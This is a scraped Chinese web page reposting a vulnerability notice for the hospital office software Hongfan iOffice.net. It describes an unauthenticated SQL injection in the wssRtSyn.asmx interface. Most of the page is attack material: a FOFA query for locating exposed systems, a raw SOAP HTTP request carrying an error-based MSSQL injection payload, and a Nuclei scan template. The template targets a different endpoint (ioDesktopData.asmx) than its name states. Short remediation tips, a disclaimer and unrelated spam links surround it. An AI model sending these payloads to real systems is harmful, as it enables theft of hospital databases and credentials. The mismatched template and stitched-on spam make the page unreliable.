当前位置: 首页 > news >正文

那个网站教你做毕设的上海优化外包公司排名

那个网站教你做毕设的,上海优化外包公司排名,网站策划书的政策背景,重庆有线4001【产品漏洞简述】 红帆iOffice.net从最早满足医院行政办公需求#xff08;传统OA#xff09;#xff0c;到目前融合了卫生主管部门的管理规范和众多行业特色应用#xff0c;是目前唯一定位于解决医院综合业务管理的软件#xff0c;是最符合医院行业特点的医院综…【产品漏洞简述】 红帆iOffice.net从最早满足医院行政办公需求传统OA到目前融合了卫生主管部门的管理规范和众多行业特色应用是目前唯一定位于解决医院综合业务管理的软件是最符合医院行业特点的医院综合业务管理平台是成功案例最多的医院综合业务管理软件。 红帆iOffice.net wssRtSyn.asmx接口处存在SQL注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。 【资产测绘Query】 app红帆-ioffice 【产品界面】 【poc】 POST /iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36Content-Type: text/xmlAccept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8Accept-Encoding: gzip,deflateConnection: Keep-alive?xml version1.0?soap:Envelope xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/ xmlns:tnshttp://iOffice.net/iOffice/ioRtSynsoap:Header /soap:Bodytns:SubmitLogInfotns:dataqwe/tns:datatns:ServerHost1(SELECT CHAR(103)CHAR(105)CHAR(75)CHAR(83) WHERE 66216621 AND 7795 IN (SELECT (CHAR(113)CHAR(118)CHAR(106)CHAR(122)CHAR(113)(SELECT version)CHAR(113)CHAR(118)CHAR(113)CHAR(120)CHAR(113))))/tns:ServerHost/tns:SubmitLogInfo/soap:Body/soap:Envelope 【Nuclei-Poc验证】 id: hongfan-iOffice-wssRtSyn-sqliinfo:name: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞author: 王阿姨介绍的severity: criticaldescription: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。reference:metadata:verified: truemax-request: 1fofa-query: FOFA:app红帆-iofficetags: sqlirequests:- raw:- |POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/GetDepScheduleContent-Type: text/xml;charsetUTF-8soap:Envelope xmlns:soaphttp://www.w3.org/2003/05/soap-envelope xmlns:temhttp://tempuri.org/soap:Header/soap:Bodytem:GetDepSchedule!--type: string--tem:EmpLoginID1(SELECT CHAR(103)CHAR(105)CHAR(75)CHAR(83) WHERE 66216621 AND 7795 IN (SELECT (CHAR(113)CHAR(118)CHAR(106)CHAR(122)CHAR(113)(SELECT version)CHAR(113)CHAR(118)CHAR(113)CHAR(120)CHAR(113))))/tem:EmpLoginID/tem:GetDepSchedule/soap:Body/soap:Envelopematchers-condition: andmatchers:- type: wordpart: bodywords:- SQL Server- Systemcondition: and- type: statusstatus:- 500 【修复建议】 1、请联系厂商进行修复。 2、如非必要禁止公网访问该系统。 3、设置白名单访问。 申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法。
http://www.dnsts.com.cn/news/225119.html

相关文章:

  • 建网站wordpress北京好的设计公司有哪些
  • 网站设计要点 优帮云网站建设费钱吗
  • 360网站提交入口地址有网络网站打不开怎么回事
  • 湖北住房和城乡建设厅网站内网网站建设主流语言
  • 网站建设费算办公费吗成都哪里好玩的地方排行榜前十名
  • 中国做民宿的网站新闻类网站源码
  • 精品网站建设费用磐石网络名气网站经常出现502
  • 开发一个视频网站要多少钱申请域名后可以做自己的网站吗
  • 小学网站模板网站开发远程服务器如何设置
  • 宁夏网站建设一条龙百度网站建设费用多少知乎
  • 企业门户网站用户类型长春新建高铁站
  • 做彩票网站合法吗珲春建设银行网站
  • 网站比较分析什么网站百度的收录高
  • 网站如何做线下的市场推广公司官网的seo
  • 公司网站开发用什么软件wordpress搜索引擎
  • 制作网站首页教案百度搜索排行
  • 企业网站邮箱建设麻豆人文化活动策划有限公司
  • 二手房网站怎么做才能接到电话江西省赣州市信丰县
  • 网站空间转移wordpress中文怎么设置中文乱码
  • 怎么查网站的外链图片素材网站排行榜
  • 网站空间如何选择it培训机构排名北京
  • 哈尔滨网站建设推广服务如何做正版小说网站
  • 新光途网站建设网络广告推广公司
  • seo查询站长工具个人直播平台搭建
  • 学习aspmvc网站开发 书开发一个淘宝app需要多少钱
  • 泉州网页网站制作wordpress手动摘要不显示
  • 蚌埠大建设及棚户区改造官方网站科技感强的网站
  • 高端网站建设 炫酷wordpress设置网站背景图片
  • wordpress 手机 自建站wordpress主题在哪
  • 免费做网站软件长沙seo优化外包公司